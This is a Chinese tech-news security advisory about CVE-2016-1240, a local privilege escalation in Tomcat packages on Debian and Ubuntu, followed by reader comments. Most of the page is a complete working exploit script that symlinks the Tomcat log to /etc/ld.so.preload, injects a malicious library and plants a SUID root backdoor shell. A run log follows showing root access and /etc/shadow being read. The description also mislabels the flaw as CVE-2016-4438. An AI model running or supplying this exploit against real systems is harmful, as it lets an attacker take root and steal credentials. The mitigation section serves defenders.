+
 新版

Tomcat 本地提权漏洞预警

Tomcat是由Apache软件基金会下属的Jakarta项目开发的一个Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和JavaServer Page(JSP)的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全域管理和Tomcat阀等。

10月1日,Tomcat爆出了一个本地提权漏洞。通过该漏洞,攻击者可以通过一个低权限的Tomcat用户获得系统的root权限。

漏洞相关信息:

CVE ID:

CVE-2016-1240

影响范围:

Tomcat 8 <= 8.0.36-2

Tomcat 7 <= 7.0.70-2

Tomcat 6 <= 6.0.45+dfsg-1~deb8u1

受影响的系统包括Debian、Ubuntu,其他使用相应deb包的系统也可能受到影响。

漏洞描述:

Debian系统的linux上管理员通常利用apt-get进行包管理,CVE-2016-4438这一漏洞其问题出在Tomcat的deb包中,使 deb包安装的Tomcat程序会自动为管理员安装一个启动脚本:/etc/init.d/tocat* 利用该脚本,可导致攻击者通过低权限的Tomcat用户获得系统root权限!

# Run the catalina.sh script as a daemon

set +e

touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

本地攻击者,作为tomcat用户(比如说,通过web应用的漏洞)若将catalina.out修改为指向任意系统文件的链接,一旦Tomcat init脚本(ROOT权限运行)在服务重启后再次打开catalina.out文件,攻击者就可获取ROOT权限。

漏洞PoC: #!/bin/bash

#

# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit

#

# CVE-2016-1240

#

# Discovered and coded by:

#

# Dawid Golunski

# http://legalhackers.com

#

# This exploit targets Tomcat (versions 6, 7 and 8) packaging on 

# Debian-based distros including Debian, Ubuntu etc.

# It allows attackers with a tomcat shell (e.g. obtained remotely through a 

# vulnerable java webapp, or locally via weak permissions on webapps in the 

# Tomcat webroot directories etc.) to escalate their privileges to root.

#

# Usage:

# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]

#

# The exploit can used in two ways:

#

# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly

# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. 

# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up

# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)

#

# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to 

# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. 

# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a 

# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can

# then add arbitrary commands to the file which will be executed with root privileges by 

# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default 

# Ubuntu/Debian Tomcat installations).

#

# See full advisory for details at:

# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html

#

# Disclaimer:

# For testing purposes only. Do no harm.

#


BACKDOORSH="/bin/bash"

BACKDOORPATH="/tmp/tomcatrootsh"

PRIVESCLIB="/tmp/privesclib.so"

PRIVESCSRC="/tmp/privesclib.c"

SUIDBIN="/usr/bin/sudo"


function cleanexit {

# Cleanup 

echo -e "\n[+] Cleaning up..."

rm -f $PRIVESCSRC

rm -f $PRIVESCLIB

rm -f $TOMCATLOG

touch $TOMCATLOG

if [ -f /etc/ld.so.preload ]; then

echo -n > /etc/ld.so.preload 2>/dev/null

fi

echo -e "\n[+] Job done. Exiting with code $1 \n"

exit $1

}


function ctrl_c() {

echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."

cleanexit 0

}

#intro 

echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n"

echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"


# Args

if [ $# -lt 1 ]; then

echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n"

exit 3

fi

if [ "$2" = "-deferred" ]; then

mode="deferred"

else

mode="active"

fi


# Priv check

echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`"

id | grep -q tomcat

if [ $? -ne 0 ]; then

echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n"

exit 3

fi


# Set target paths

TOMCATLOG="$1"

if [ ! -f $TOMCATLOG ]; then

echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n"

exit 3

fi

echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG"


# [ Deferred exploitation ]


# Symlink the log file to /etc/default/locale file which gets executed daily on default

# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.

# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been

# restarted and file owner gets changed.

if [ "$mode" = "deferred" ]; then

rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG

if [ $? -ne 0 ]; then

echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."

cleanexit 3

fi

echo -e"\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"

echo -e"\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`"

echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot"

echo -ne "\n you'll be able to add arbitrary commands to the file which will get executed with root privileges"

echo -ne "\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)

\n\n"

exit 0

fi


# [ Active exploitation ]


trap ctrl_c INT

# Compile privesc preload library

echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"

cat <<_solibeof_>$PRIVESCSRC

#define _GNU_SOURCE

#include <stdio.h>

#include <sys/stat.h>

#include <unistd.h>

#include <dlfcn.h>

uid_t geteuid(void) {

static uid_t(*old_geteuid)();

old_geteuid = dlsym(RTLD_NEXT, "geteuid");

if ( old_geteuid() == 0 ) {

chown("$BACKDOORPATH", 0, 0);

chmod("$BACKDOORPATH", 04777);

unlink("/etc/ld.so.preload");

}

return old_geteuid();

}

_solibeof_

gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl

if [ $? -ne 0 ]; then

echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."

cleanexit 2;

fi


# Prepare backdoor shell

cp $BACKDOORSH $BACKDOORPATH

echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"


# Safety check

if [ -f /etc/ld.so.preload ]; then

echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."

cleanexit 2

fi


# Symlink the log file to ld.so.preload

rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG

if [ $? -ne 0 ]; then

echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."

cleanexit 3

fi

echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"


# Wait for Tomcat to re-open the logs

echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..."

echo -e"\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)

"

while :; do 

sleep 0.1

if [ -f /etc/ld.so.preload ]; then

echo $PRIVESCLIB > /etc/ld.so.preload

break;

fi

done


# /etc/ld.so.preload file should be owned by tomcat user at this point

# Inject the privesc.so shared library to escalate privileges

echo $PRIVESCLIB > /etc/ld.so.preload

echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`"

echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"

echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"


# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)

echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"

sudo --help 2>/dev/null >/dev/null


# Check for the rootshell

ls -l $BACKDOORPATH | grep rws | grep -q root

if [ $? -eq 0 ]; then 

echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"

echo -e "\n\033[94mPlease tell me you're seeing this too ;)

\033[0m"

else

echo -e "\n[!] Failed to get root"

cleanexit 2

fi


# Execute the rootshell

echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n"

$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"

$BACKDOORPATH -p


# Job done.

cleanexit 0 Poc运行示例: tomcat7@ubuntu:/tmp$ id

uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)


tomcat7@ubuntu:/tmp$ lsb_release -a

No LSB modules are available.

Distributor ID: Ubuntu

Description: Ubuntu 16.04 LTS

Release: 16.04

Codename: xenial


tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat

iilibtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries

iitomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine

iitomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files


tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out 


Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit

CVE-2016-1240


Discovered and coded by: 


Dawid Golunski 


http://legalhackers.com


[+] Starting the exploit in [active] mode with the following privileges: 

uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)


[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out


[+] Compiling the privesc shared library (/tmp/privesclib.c)


[+] Backdoor/low-priv shell installed at: 

-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh


[+] Symlink created at: 

lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload


[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...

You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)



[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: 

-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload


[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload


[+] The /etc/ld.so.preload file now contains: 

/tmp/privesclib.so


[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!


[+] Rootshell got assigned root SUID perms at: 

-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh


Please tell me you're seeing this too ;)



[+] Executing the rootshell /tmp/tomcatrootsh now! 


tomcatrootsh-4.3# id

uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)

tomcatrootsh-4.3# whoami

root

tomcatrootsh-4.3# head -n3 /etc/shadow

root:$6$oaf[cut]:16912:0:99999:7:::

daemon:*:16912:0:99999:7:::

bin:*:16912:0:99999:7:::

tomcatrootsh-4.3# exit

应急修复方案:

1.临时修复建议

如对更新包风险的考虑,可先更改Tomcat的启动脚本为 chown -h $TOMCAT6_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

加入 - h参数防止其他文件所有者被更改。

2. 更新最新Tomcat包

更新至系统提供的最新版Tomcat包即可。

稿源:孝道科技

Tomcat 本地提权漏洞预警
Feng_Yu
Feng_Yu
2016-10-09 13:37
我就不知道你们上面有什么好呵呵的,我一直用的apt安装的tomcat7,在我看来比压缩包解压省事多了,而且用户权限都给你创建好了,批量部署tomcat我一直用的这个方案。这个漏洞要想修复也不是难事,手工制定下脚本的属主就完了,多大个事?值得你们上面这帮人极尽冷嘲热讽吗?
回复
举报
乌龟壳
乌龟壳
2016-10-09 13:27
@凝小紫 建议排版下
回复
举报
osc_1769948
osc_1769948
2016-10-09 09:51
还好没人会这么装tomcat吧。。。
回复
举报
酸辣粉加鸡蛋
酸辣粉加鸡蛋
2016-10-09 09:35
windows环境没影响吧
回复
举报
yangjh_chs
yangjh_chs
2016-10-09 09:16

引用来自“eechen”的评论

Java很安全?又呵呵了.
这跟java有毛关系?你没看到是linux软连接?
回复
举报
yangjh_chs
yangjh_chs
2016-10-09 09:15
用这种方式安装tomcat的要么是学习的时候要么是搞测试,谁生产环境这么搞,我就呵呵了
回复
举报
阿信sxq
阿信sxq
2016-10-09 09:12

引用来自“eechen”的评论

Java很安全?又呵呵了.
这个不怪tomcat或者java,怪debian的打包
回复
举报
阿信sxq
阿信sxq
2016-10-09 09:12
会有人用这种方式安装tomcat?
回复
举报
wj2699
wj2699
2016-10-09 09:08
java说这锅我不背
回复
举报
eechen
eechen
2016-10-09 08:53
Java很安全?又呵呵了.
回复
举报
chendb
chendb
2016-10-09 08:45
非deb的受影响吗
回复
举报
沧海一刀
沧海一刀
2016-10-09 08:08
身败名裂
回复
举报
liyghting
liyghting
2016-10-09 07:48
必顶
回复
举报
回复 @
{{ emoji.type }}
{{emojiItem.symbol}}
热门资讯
TIOBE 6 月榜单: Rust 创历史新高,C++ 重回 Top3
白开水不加糖 · 06/08 11:50
0 评论
程序员为养生把喝可乐改成果汁,半年瘦 20 斤进抢救室
白开水不加糖 · 06/05 18:59
0 评论
阿里开源 AI 代码审查 CLI 工具:Open Code Review
· 06/05 18:34
3 评论
Cloudflare 收购尤雨溪创业公司 VoidZero
· 06/05 10:02
0 评论
“Windows 任务管理器之父”用纯 C 手搓了一个文本编辑器,致敬经典 Petzold 编程风格
· 06/08 16:21
0 评论
“微软,够了!”—— Windows 垄断下的浏览器竞争失序
· 06/05 15:23
0 评论
微信宣布面向开发者提供接入微信 AI 生态的能力
· 06/08 17:23
0 评论
百度开源 nettools,大规模物理网络监控工具集
· 06/05 19:17
0 评论
国际 C 语言混乱代码大赛最新获奖作品出炉:GameBoy 模拟器、海底声音与黑洞 Fortran
· 06/09 17:48
0 评论
开发者请愿 Anthropic 发布 Claude Desktop 官方 Linux 版本
· 06/08 11:52
3 评论
删除一条评论

评论删除后,数据将无法恢复

取消
确定
返回顶部
顶部